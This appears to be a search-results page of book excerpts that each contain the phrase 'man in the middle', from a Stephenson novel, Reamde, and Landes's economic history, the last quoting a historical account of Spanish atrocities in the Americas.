He’d been conversing with a sedan-porter, but had broken off to stare at the buyer’s hackney. Indeed many were now staring at it, for it was smoking. And it was making booms as the passenger flailed against the roof, signalling the driver to stop. The door on the right side flew open and disgorged a cloud of brown-gray smoke. So dense and voluminous was this, that a long and careful inspection was needed to see that there was a man in the middle of it. He was staggering away from the carriage, headed for the parapet that surrounded the Square to limit the number of pedestrians who toppled into St. Mary’s Lock. The passenger looked like a figure from Ovid: a Cloud metamorphosing into a Man. For the smoke had saturated the long hooded cloak that he wore, and was still billowing out of it. Gagging, he shuffled toward the parapet. The hackney-driver scrambled round to the open door, probed into the smoke with his whip-handle, and after a bit of scratching about, dragged out a blackened carapace: a burnt box, still sputtering and jetting a sturdy plume of thick yellowish smoke.


pages: 1,318 words: 403,894

Reamde by Neal Stephenson

air freight, airport security, crowdsourcing, digital map, drone strike, Google Earth, industrial robot, informal economy, Jones Act, large denomination, megacity, MITM: man-in-the-middle, new economy, pattern recognition, Ponzi scheme, pre–internet, ransomware, side project, Skype, slashdot, South China Sea, the built environment, the scientific method, young professional

From the stairs they trooped out into the fifth-floor corridor, which conveniently for them was empty at the moment. Sokolov was leading the way, but as they passed 503 he looked over his shoulder and made room for Kautsky, the biggest man in the squad, the door breaker. Kautsky was armed with a combination sledge-hammer/ax/crowbar that could make short work of any door. The ones in this building looked particularly flimsy, so Sokolov had no worries about getting through rapidly. Kautsky would be their man in the middle, the first one through, who would hold the center and block the exit while the others flooded in behind him and flowed to the edges. Ivanov had no scripted part in this plan, since he was supposed to be waiting down in the van, but Sokolov hoped that he would have the good sense to stay well to the rear, in the hallway, long enough for things to get under control. Then he could come in and wreak whatever revenge it was that he had been dreaming of.


Wealth and Poverty of Nations by David S. Landes

"Robert Solow", Admiral Zheng, affirmative action, agricultural Revolution, Atahualpa, Ayatollah Khomeini, Bartolomé de las Casas, British Empire, business cycle, Cape to Cairo, clean water, colonial rule, Columbian Exchange, computer age, David Ricardo: comparative advantage, deindustrialization, deskilling, European colonialism, Fellow of the Royal Society, financial intermediation, Francisco Pizarro, germ theory of disease, glass ceiling, illegal immigration, income inequality, Index librorum prohibitorum, interchangeable parts, invention of agriculture, invention of movable type, invisible hand, Isaac Newton, James Watt: steam engine, John Harrison: Longitude, joint-stock company, Just-in-time delivery, Kenneth Arrow, land tenure, lateral thinking, mass immigration, Mexican peso crisis / tequila crisis, MITM: man-in-the-middle, Monroe Doctrine, Murano, Venice glass, new economy, New Urbanism, North Sea oil, out of africa, passive investing, Paul Erdős, Paul Samuelson, Philip Mirowski, rent-seeking, Right to Buy, Scramble for Africa, Simon Kuznets, South China Sea, spice trade, spinning jenny, The Wealth of Nations by Adam Smith, trade route, transaction costs, transatlantic slave trade, Vilfredo Pareto, zero-sum game

When Columbus met his first Indians, he could not get over their trust and friendliness; to this the Spaniards, frustrated for gold, re­ turned bestialities unworthy of beasts: They came with their Horsemen well armed with Sword and Launce, making most cruel havocks and slaughters. . . . Overrunning Cities and Vil­ lages, where they spared no sex nor age; neither would their cruelty pity Women with childe, whose bellies they would rip up, taking out the Infant to hew it in pieces. They would often lay wagers who should with most dex­ terity either cleave or cut a man in the middle. . . . The children they would take by the feet and dash their innocent heads against the rocks, and when they were fallen into the water, with a strange and cruel derision they would call on them to swim. . . . They erected certains Gallowses . . . upon every one of which they would hang thirteen persons, blasphemously affirming that they did it in honour o f our Redeemer and his Apostles, and then putting fire under them, they burnt the poor wretches alive.